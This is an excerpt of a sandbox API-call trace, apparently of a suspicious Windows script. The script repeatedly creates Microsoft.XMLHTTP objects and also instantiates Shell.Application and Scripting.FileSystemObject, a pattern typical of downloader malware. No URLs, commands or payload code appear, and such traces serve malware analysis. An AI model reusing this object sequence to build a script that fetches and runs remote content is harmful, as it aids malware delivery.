	[0253.334] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0253.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0253.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0253.335] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0253.335] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0253.335] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0253.335] SysStringLen (param_1=0x0) returned 0x0
	[0253.335] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0253.335] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0253.335] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0253.335] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0253.335] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0253.335] ??2@YAPEAX_K@Z () returned 0x62f350
	[0253.335] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0253.335] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0253.336] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0253.336] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0253.336] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0253.336] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0253.336] SysStringLen (param_1=0x0) returned 0x0
	[0253.336] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0253.339] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0253.339] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0253.339] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0253.340] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0253.340] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0253.340] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0254.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0254.296] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0254.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0254.297] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.298] SysStringLen (param_1=0x0) returned 0x0
	[0254.298] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0254.298] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0254.298] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0254.298] ??2@YAPEAX_K@Z () returned 0x62f330
	[0254.298] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0254.298] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.298] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0254.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0254.298] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0254.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.713] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.716] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.716] SysStringLen (param_1=0x0) returned 0x0
	[0254.716] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0254.716] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0254.716] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0254.717] ??2@YAPEAX_K@Z () returned 0x62f310
	[0254.717] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.717] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.717] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.717] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.717] SysStringLen (param_1=0x0) returned 0x0
	[0254.717] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0254.717] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0254.717] ??2@YAPEAX_K@Z () returned 0x62f330
	[0254.717] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.717] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0254.717] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.718] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.718] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.718] SysStringLen (param_1=0x0) returned 0x0
	[0254.718] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0254.718] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0254.718] ??2@YAPEAX_K@Z () returned 0x62f310
	[0254.718] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.718] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.718] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.718] longjmp () 
	[0254.719] longjmp () 
	[0254.719] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.719] SysStringLen (param_1=0x0) returned 0x0
	[0254.719] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
